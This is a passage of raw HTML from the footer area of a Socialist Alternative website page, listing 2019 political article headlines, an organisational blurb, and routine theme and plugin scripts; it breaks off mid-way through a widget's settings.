--></div><!--./row-fluid--> <div class="td-block-row"> <div class="td-block-span4"> <div class="td_module_1 td_module_wrap td-animation-stack"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/05/04/may-fourth-movement-1919-when-chinas-students-opened-the-political-floodgates/" rel="bookmark" class="td-image-wrap" title="May Fourth Movement 1919: When China’s Students Opened the Political Floodgates"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAACgAQMAAABOhoelAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAAB1JREFUWMPtwTEBAAAAwiD7p/ZdCGAAAAAAAAAQBxpAAAH8le3bAAAAAElFTkSuQmCC"alt="" title="May Fourth Movement 1919: When China’s Students Opened the Political Floodgates" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/05/MayFourthMovement-324x160.jpg" width="324" height="160" /></a></div> <a href="https://www.socialistalternative.org/category/history/" class="td-post-category">History</a> </div> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/05/04/may-fourth-movement-1919-when-chinas-students-opened-the-political-floodgates/" rel="bookmark" title="May Fourth Movement 1919: When China’s Students Opened the Political Floodgates">May Fourth Movement 1919: When China’s Students Opened the Political Floodgates</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-04T09:56:32+00:00" >May 4, 2019</time></span> </div> </div> </div> <!-- ./td-block-span4 --> <div class="td-block-span4"> <div class="td_module_1 td_module_wrap td-animation-stack"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/05/02/seattle-is-dying-housing-crisis-fuels-polarization-in-city-council-elections/" rel="bookmark" class="td-image-wrap" title="“Seattle is Dying”: Housing Crisis Fuels Polarization in City Council Elections"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAACgAQMAAABOhoelAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAAB1JREFUWMPtwTEBAAAAwiD7p/ZdCGAAAAAAAAAQBxpAAAH8le3bAAAAAElFTkSuQmCC"alt="" title="“Seattle is Dying”: Housing Crisis Fuels Polarization in City Council Elections" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/05/3631824780_abf6ffe728_b-e1556843968778-324x160.jpg" width="324" height="160" /></a></div> <a href="https://www.socialistalternative.org/category/housing/" class="td-post-category">Housing</a> </div> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/05/02/seattle-is-dying-housing-crisis-fuels-polarization-in-city-council-elections/" rel="bookmark" title="“Seattle is Dying”: Housing Crisis Fuels Polarization in City Council Elections">“Seattle is Dying”: Housing Crisis Fuels Polarization in City Council Elections</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-02T20:49:23+00:00" >May 2, 2019</time></span> </div> </div> </div> <!-- ./td-block-span4 --> <div class="td-block-span4"> <div class="td_module_1 td_module_wrap td-animation-stack"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/05/02/columbusstudentdeserve-fully-funded-schools-not-corporate-handouts/" rel="bookmark" class="td-image-wrap" title="#ColumbusStudentDeserve Fully Funded Schools, Not Corporate Handouts"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAACgAQMAAABOhoelAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAAB1JREFUWMPtwTEBAAAAwiD7p/ZdCGAAAAAAAAAQBxpAAAH8le3bAAAAAElFTkSuQmCC"alt="" title="#ColumbusStudentDeserve Fully Funded Schools, Not Corporate Handouts" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/05/CEA-banner-324x160.jpg" width="324" height="160" /></a></div> <a href="https://www.socialistalternative.org/category/socialist-alternative-in-action/" class="td-post-category">Socialist Alternative In Action</a> </div> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/05/02/columbusstudentdeserve-fully-funded-schools-not-corporate-handouts/" rel="bookmark" title="#ColumbusStudentDeserve Fully Funded Schools, Not Corporate Handouts">#ColumbusStudentDeserve Fully Funded Schools, Not Corporate Handouts</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-02T12:29:16+00:00" >May 2, 2019</time></span> </div> </div> </div> <!-- ./td-block-span4 --></div><!--./row-fluid--> </div> </div> <!-- /.td-pb-row --> </div> <!-- /.td-container --> </div> <!-- /.td-main-content-wrap --> <!-- Instagram --> <!-- Footer --> <div class="td-footer-wrapper td-container-wrap td_stretch_content"> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span12"> </div> </div> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td_block_wrap td_block_1 td_block_widget td_uid_39_5cdd903e5959f_rand td-pb-border-top td_block_template_3 td-column-3" data-td-block-uid="td_uid_39_5cdd903e5959f" ><script>var block_td_uid_39_5cdd903e5959f = new tdBlock(); block_td_uid_39_5cdd903e5959f.id = "td_uid_39_5cdd903e5959f"; block_td_uid_39_5cdd903e5959f.atts = '{"custom_title":"Top Stories","custom_url":"","block_template_id":"td_block_template_3","header_color":"#","header_text_color":"#","accent_text_color":"#","m4_tl":"","m4_el":"","m6_tl":"","limit":"8","offset":"","el_class":"","post_ids":"","category_id":"2125","category_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","sort":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","ajax_pagination":"","ajax_pagination_infinite_stop":"","class":"td_block_widget td_uid_39_5cdd903e5959f_rand","separator":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","m4f_title_font_header":"","m4f_title_font_title":"Article title","m4f_title_font_settings":"","m4f_title_font_family":"","m4f_title_font_size":"","m4f_title_font_line_height":"","m4f_title_font_style":"","m4f_title_font_weight":"","m4f_title_font_transform":"","m4f_title_font_spacing":"","m4f_title_":"","m4f_cat_font_title":"Article category tag","m4f_cat_font_settings":"","m4f_cat_font_family":"","m4f_cat_font_size":"","m4f_cat_font_line_height":"","m4f_cat_font_style":"","m4f_cat_font_weight":"","m4f_cat_font_transform":"","m4f_cat_font_spacing":"","m4f_cat_":"","m4f_meta_font_title":"Article meta info","m4f_meta_font_settings":"","m4f_meta_font_family":"","m4f_meta_font_size":"","m4f_meta_font_line_height":"","m4f_meta_font_style":"","m4f_meta_font_weight":"","m4f_meta_font_transform":"","m4f_meta_font_spacing":"","m4f_meta_":"","m4f_ex_font_title":"Article excerpt","m4f_ex_font_settings":"","m4f_ex_font_family":"","m4f_ex_font_size":"","m4f_ex_font_line_height":"","m4f_ex_font_style":"","m4f_ex_font_weight":"","m4f_ex_font_transform":"","m4f_ex_font_spacing":"","m4f_ex_":"","m6f_title_font_header":"","m6f_title_font_title":"Article title","m6f_title_font_settings":"","m6f_title_font_family":"","m6f_title_font_size":"","m6f_title_font_line_height":"","m6f_title_font_style":"","m6f_title_font_weight":"","m6f_title_font_transform":"","m6f_title_font_spacing":"","m6f_title_":"","m6f_cat_font_title":"Article category tag","m6f_cat_font_settings":"","m6f_cat_font_family":"","m6f_cat_font_size":"","m6f_cat_font_line_height":"","m6f_cat_font_style":"","m6f_cat_font_weight":"","m6f_cat_font_transform":"","m6f_cat_font_spacing":"","m6f_cat_":"","m6f_meta_font_title":"Article meta info","m6f_meta_font_settings":"","m6f_meta_font_family":"","m6f_meta_font_size":"","m6f_meta_font_line_height":"","m6f_meta_font_style":"","m6f_meta_font_weight":"","m6f_meta_font_transform":"","m6f_meta_font_spacing":"","m6f_meta_":"","css":"","tdc_css":"","td_column_number":3,"color_preset":"","border_top":"","tdc_css_class":"td_uid_39_5cdd903e5959f_rand","tdc_css_class_style":"td_uid_39_5cdd903e5959f_rand_style"}'; block_td_uid_39_5cdd903e5959f.td_column_number = "3"; block_td_uid_39_5cdd903e5959f.block_type = "td_block_1"; block_td_uid_39_5cdd903e5959f.post_count = "8"; block_td_uid_39_5cdd903e5959f.found_posts = "103"; block_td_uid_39_5cdd903e5959f.header_color = "#"; block_td_uid_39_5cdd903e5959f.ajax_pagination_infinite_stop = ""; block_td_uid_39_5cdd903e5959f.max_num_pages = "13"; tdBlocksArray.push(block_td_uid_39_5cdd903e5959f); </script><div class="td-block-title-wrap"><h4 class="td-block-title"><span class="td-pulldown-size">Top Stories</span></h4></div><div id=td_uid_39_5cdd903e5959f class="td_block_inner"> <div class="td-block-row"> <div class="td-block-span4"> <div class="td_module_4 td_module_wrap td-animation-stack"> <div class="td-module-image"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/05/02/seattle-is-dying-housing-crisis-fuels-polarization-in-city-council-elections/" rel="bookmark" class="td-image-wrap" title="“Seattle is Dying”: Housing Crisis Fuels Polarization in City Council Elections"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAADrAQMAAAArGX0KAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAACBJREFUaN7twTEBAAAAwiD7pzbEXmAAAAAAAAAAAACQHSaOAAGSp1GBAAAAAElFTkSuQmCC"alt="" title="“Seattle is Dying”: Housing Crisis Fuels Polarization in City Council Elections" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/05/3631824780_abf6ffe728_b-e1556843968778-324x235.jpg" width="324" height="235" /></a></div> </div> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/05/02/seattle-is-dying-housing-crisis-fuels-polarization-in-city-council-elections/" rel="bookmark" title="“Seattle is Dying”: Housing Crisis Fuels Polarization in City Council Elections">“Seattle is Dying”: Housing Crisis Fuels Polarization in City Council Elections</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-02T20:49:23+00:00" >May 2, 2019</time></span> </div> <div class="td-excerpt"> A “sensationalized spree of fear and hate-mongering,” is how Seattle’s Crosscut aptly characterized KOMO-TV’s special on the homelessness crisis. Called “Seattle is... </div> </div> </div> <!-- ./td-block-span4 --> <div class="td-block-span4"> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/05/01/imf-warns-of-growth-slowdown-trump-increasing-economic-instability/" rel="bookmark" class="td-image-wrap" title="IMF Warns of “Growth Slowdown” &#8211; Trump Increasing Economic Instability"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII="alt="" title="IMF Warns of “Growth Slowdown” &#8211; Trump Increasing Economic Instability" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/05/TrumpPowell-April2019-100x70.jpg" width="100" height="70" /></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/05/01/imf-warns-of-growth-slowdown-trump-increasing-economic-instability/" rel="bookmark" title="IMF Warns of “Growth Slowdown” &#8211; Trump Increasing Economic Instability">IMF Warns of “Growth Slowdown” &#8211; Trump Increasing Economic Instability</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-05-01T14:31:52+00:00" >May 1, 2019</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/04/22/can-the-u-s-and-china-end-their-trade-war/" rel="bookmark" class="td-image-wrap" title="Can the U.S. and China End Their Trade War?"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII="alt="" title="Can the U.S. and China End Their Trade War?" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/04/US-China-flags-100x70.jpg" width="100" height="70" /></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/04/22/can-the-u-s-and-china-end-their-trade-war/" rel="bookmark" title="Can the U.S. and China End Their Trade War?">Can the U.S. and China End Their Trade War?</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-04-22T10:00:03+00:00" >April 22, 2019</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/03/28/evict-corporate-developers-build-social-housing/" rel="bookmark" class="td-image-wrap" title="Evict Corporate Developers – Build Social Housing"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII="alt="" title="Evict Corporate Developers – Build Social Housing" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/03/Renee-Holmes-Chateau-AtKSLaunch2019-100x70.jpg" width="100" height="70" /></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/03/28/evict-corporate-developers-build-social-housing/" rel="bookmark" title="Evict Corporate Developers – Build Social Housing">Evict Corporate Developers – Build Social Housing</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-03-28T10:15:20+00:00" >March 28, 2019</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/03/27/winning-the-green-new-deal-means-challenging-capitalism/" rel="bookmark" class="td-image-wrap" title="Winning the Green New Deal Means Challenging Capitalism"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII="alt="" title="Winning the Green New Deal Means Challenging Capitalism" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/03/GND_sit-in-2-100x70.jpg" width="100" height="70" /></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/03/27/winning-the-green-new-deal-means-challenging-capitalism/" rel="bookmark" title="Winning the Green New Deal Means Challenging Capitalism">Winning the Green New Deal Means Challenging Capitalism</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-03-27T18:00:58+00:00" >March 27, 2019</time></span> </div> </div> </div> </div> <!-- ./td-block-span4 --> <div class="td-block-span4"> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/03/06/oakland-teachers-strike-a-victory-filled-with-lessons%ef%bb%bf/" rel="bookmark" class="td-image-wrap" title="Oakland Teachers Strike: A Victory Filled With Lessons"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII="alt="" title="Oakland Teachers Strike: A Victory Filled With Lessons" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/03/Oakland-Teachers-Strike-2019-1-100x70.jpg" width="100" height="70" /></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/03/06/oakland-teachers-strike-a-victory-filled-with-lessons%ef%bb%bf/" rel="bookmark" title="Oakland Teachers Strike: A Victory Filled With Lessons">Oakland Teachers Strike: A Victory Filled With Lessons</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-03-06T19:35:50+00:00" >March 6, 2019</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/02/20/lets-use-bernies-2020-campaign-to-launch-a-mass-working-class-fightback/" rel="bookmark" class="td-image-wrap" title="Let&#8217;s Use Bernie’s 2020 Campaign to Launch a Mass Working Class Fightback"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII="alt="" title="Let&#8217;s Use Bernie’s 2020 Campaign to Launch a Mass Working Class Fightback" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/02/Bernie-100x70.png" width="100" height="70" /></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/02/20/lets-use-bernies-2020-campaign-to-launch-a-mass-working-class-fightback/" rel="bookmark" title="Let&#8217;s Use Bernie’s 2020 Campaign to Launch a Mass Working Class Fightback">Let&#8217;s Use Bernie’s 2020 Campaign to Launch a Mass Working Class Fightback</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-02-20T13:32:22+00:00" >February 20, 2019</time></span> </div> </div> </div> <div class="td_module_6 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="https://www.socialistalternative.org/2019/02/04/ocasio-cortez-exposes-rot-corporate-politics-mass-action-party-needed/" rel="bookmark" class="td-image-wrap" title="Ocasio-Cortez Exposes the Rot of Corporate Politics &#8211; Mass Action and New Party Needed Next"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABGAQMAAAAASKMqAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABBJREFUKM9jGAWjYBQMKwAAA9QAAQWBn6cAAAAASUVORK5CYII="alt="" title="Ocasio-Cortez Exposes the Rot of Corporate Politics &#8211; Mass Action and New Party Needed Next" data-type="image_tag" data-img-url="https://www.socialistalternative.org/wp-content/uploads/2019/01/h_15151429-ocasio-cortez-pelosi-1543330413-100x70.jpg" width="100" height="70" /></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="https://www.socialistalternative.org/2019/02/04/ocasio-cortez-exposes-rot-corporate-politics-mass-action-party-needed/" rel="bookmark" title="Ocasio-Cortez Exposes the Rot of Corporate Politics &#8211; Mass Action and New Party Needed Next">Ocasio-Cortez Exposes the Rot of Corporate Politics &#8211; Mass Action and New Party Needed Next</a></h3> <div class="td-module-meta-info"> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-02-04T11:07:05+00:00" >February 4, 2019</time></span> </div> </div> </div> </div> <!-- ./td-block-span4 --></div><!--./row-fluid--></div></div> <!-- ./block --> </div> </div> </div> <div class="td-footer-bottom-full"> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="https://www.socialistalternative.org/"><img class="td-retina-data" src="http://www.socialistalternative.org/wp-content/uploads/2019/02/whitelogo-1.png" data-retina="http://www.socialistalternative.org/wp-content/uploads/2019/02/whitelogo.png" alt="" title="" width="1387" /></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>Socialist Alternative is a national organization fighting in our workplaces, communities, and campuses against the exploitation and injustices people face every day. We are community activists fighting against budget cuts in public services; we are activists campaigning for a $15 an hour minimum wage and fighting, democratic unions; we are people of all colors speaking out against racism and attacks on immigrants, students organizing against tuition hikes and war, women and men fighting sexism and homophobia.<div class="footer-email-wrap">Contact us: <a href="mailto:[email protected]">[email protected]</a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div> <span class="td-social-icon-wrap"> <a target="_blank" href="http://facebook.com/socialistalternativeusa" title="Facebook"> <i class="td-icon-font td-icon-facebook"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="http://instagram.com/socialist_alternative" title="Instagram"> <i class="td-icon-font td-icon-instagram"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="http://twitter.com/socialistalt" title="Twitter"> <i class="td-icon-font td-icon-twitter"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="https://www.youtube.com/channel/UC62u7RNy_5YdTgdOjkdRecg" title="Youtube"> <i class="td-icon-font td-icon-youtube"></i> </a> </span></aside></div> </div> </div> </div> </div> <!-- Sub Footer --> <div class="td-sub-footer-container td-container-wrap td_stretch_content"> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span td-sub-footer-menu"> </div> <div class="td-pb-span td-sub-footer-copy"> &copy; Socialist Alternative 2019 | All rights reserved </div> </div> </div> </div> </div><!--close td-outer-wrap--> <!-- Theme: Newspaper by tagDiv.com 2019 Version: 9.5 (rara) Deploy mode: deploy uid: 5cdd903e65af0 --> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/www.socialistalternative.org\/cart\/","is_cart":"","cart_redirect_after_add":"yes"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.5.7'></script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.5.7'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_f419111f5b806a2eed737e1ea4fcf604","fragment_name":"wc_fragments_f419111f5b806a2eed737e1ea4fcf604"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.5.7'></script> <script type='text/javascript'> /* <![CDATA[ */ var socialWarfare = {"addons":[],"post_id":"0","floatBeforeContent":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.4'></script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-includes/js/underscore.min.js?ver=1.8.3'></script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-content/plugins/td-cloud-library/assets/js/js_posts_autoload.min.js?ver=726837bbdee984ffb331a234aadde124'></script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-content/themes/Newspaper/js/tagdiv_theme.min.js?ver=9.5'></script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=726837bbdee984ffb331a234aadde124'></script> <script type='text/javascript' src='https://www.socialistalternative.org/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type="text/javascript"> var swp_nonce = "74e704ad47"; function parentIsEvil() { var html = null; try { var doc = top.location.pathname; } catch(err){ }; if(typeof doc === "undefined") { return true } else { return false }; }; if (parentIsEvil()) { top.location = self.location.href; };var url = "https://www.socialistalternative.org/2019/05/02/columbusstudentdeserve-fully-funded-schools-not-corporate-handouts/";if(url.indexOf("stfi.re") != -1) { var canonical = ""; var links = document.getElementsByTagName("link"); for (var i = 0; i < links.length; i ++) { if (links[i].getAttribute("rel") === "canonical") { canonical = links[i].getAttribute("href")}}; canonical = canonical.replace("?sfr=1", "");top.location = canonical; console.log(canonical);};var swpFloatBeforeContent = true;var swpClickTracking = false;</script> <!-- JS generated by theme --> <script> /* global jQuery:{} */ jQuery(window).load(function () { var tdbMenuItem = new tdbMenu.item(); tdbMenuItem.blockUid = 'td_uid_25_5cdd903e3c3c3'; tdbMenuItem.jqueryObj = jQuery('.td_uid_25_5cdd903e3c3c3_rand'); tdbMenu.addItem( tdbMenuItem ); tdbMenu.megaMenuFull( tdbMenuItem, false ); }); jQuery().ready(function () { var tdbSearchItem = new tdbSearch.item(); //block unique ID tdbSearchItem.blockUid = 'td_uid_28_5cdd903e42ab6'; tdbSearchItem.blockAtts = '{"toggle_txt_pos":"after","form_align":"content-horiz-right","results_msg_align":"content-horiz-center","image_floated":"float_left","image_width":"30","image_size":"td_324x400","show_cat":"none","show_btn":"none","show_date":"","show_review":"none","show_com":"none","show_excerpt":"none","show_author":"none","meta_padding":"2px 0 0 15px","art_title":"0 0 5px","all_modules_space":"20","toggle_horiz_align":"content-horiz-right","icon_color":"#ffffff","icon_color_h":"#ffffff","tdc_css":"eyJhbGwiOnsibWFyZ2luLXRvcCI6IjEwIiwibWFyZ2luLXJpZ2h0IjoiMCIsImNvbnRlbnQtaC1hbGlnbiI6ImNvbnRlbnQtaG9yaXotcmlnaHQiLCJkaXNwbGF5IjoiaW5saW5lLWJsb2NrIn19","float_block":"yes","show_form":"","separator":"","tdicon":"","icon_size":"20","icon_padding":"2.4","toggle_txt":"","toggle_txt_align":"0","toggle_txt_space":"","inline":"","form_offset":"","form_width":"","form_padding":"","form_border":"","input_placeholder":"","placeholder_travel":"0","input_padding":"","input_border":"","input_radius":"","btn_text":"Search","btn_tdicon":"","btn_icon_pos":"","btn_icon_size":"","btn_icon_space":"","btn_icon_align":"0","btn_margin":"","btn_padding":"","btn_border":"","btn_radius":"","results_padding":"","results_border":"","results_msg_padding":"","mc1_tl":"","mc1_el":"","results_limit":"","modules_on_row":"100%","modules_gap":"","m_padding":"","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_height":"","image_radius":"","hide_image":"","meta_info_align":"","meta_info_horiz":"content-horiz-left","meta_width":"","meta_margin":"","art_excerpt":"","excerpt_col":"1","excerpt_gap":"","art_btn":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","modules_category":"","modules_category_margin":"","modules_category_padding":"","modules_category_radius":"0","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","excerpt_middle":"","btn_title":"","btn_border_width":"","toggle_txt_color":"","toggle_txt_color_h":"","f_toggle_txt_font_header":"","f_toggle_txt_font_title":"Text","f_toggle_txt_font_settings":"","f_toggle_txt_font_family":"","f_toggle_txt_font_size":"","f_toggle_txt_font_line_height":"","f_toggle_txt_font_style":"","f_toggle_txt_font_weight":"","f_toggle_txt_font_transform":"","f_toggle_txt_font_spacing":"","f_toggle_txt_":"","form_bg":"","form_border_color":"","arrow_color":"","form_shadow_shadow_header":"","form_shadow_shadow_title":"Shadow","form_shadow_shadow_size":"","form_shadow_shadow_offset_horizontal":"","form_shadow_shadow_offset_vertical":"","form_shadow_shadow_spread":"","form_shadow_shadow_color":"","input_color":"","placeholder_color":"","placeholder_opacity":"0.5","input_bg":"","input_border_color":"","input_shadow_shadow_header":"","input_shadow_shadow_title":"Input shadow","input_shadow_shadow_size":"","input_shadow_shadow_offset_horizontal":"","input_shadow_shadow_offset_vertical":"","input_shadow_shadow_spread":"","input_shadow_shadow_color":"","btn_color":"","btn_color_h":"","btn_icon_color":"","btn_icon_color_h":"","btn_bg":"","btn_bg_h":"","btn_border_color":"","btn_border_color_h":"","btn_shadow_shadow_header":"","btn_shadow_shadow_title":"Button shadow","btn_shadow_shadow_size":"","btn_shadow_shadow_offset_horizontal":"","btn_shadow_shadow_offset_vertical":"","btn_shadow_shadow_spread":"","btn_shadow_shadow_color":"","f_input_font_header":"","f_input_font_title":"Input text","f_input_font_settings":"","f_input_font_family":"","f_input_font_size":"","f_input_font_line_height":"","f_input_font_style":"","f_input_font_weight":"","f_input_font_transform":"","f_input_font_spacing":"","f_input_":"","f_placeholder_font_title":"Placeholder text","f_placeholder_font_settings":"","f_placeholder_font_family":"","f_placeholder_font_size":"","f_placeholder_font_line_height":"","f_placeholder_font_style":"","f_placeholder_font_weight":"","f_placeholder_font_transform":"","f_placeholder_font_spacing":"","f_placeholder_":"","f_btn_font_title":"Button 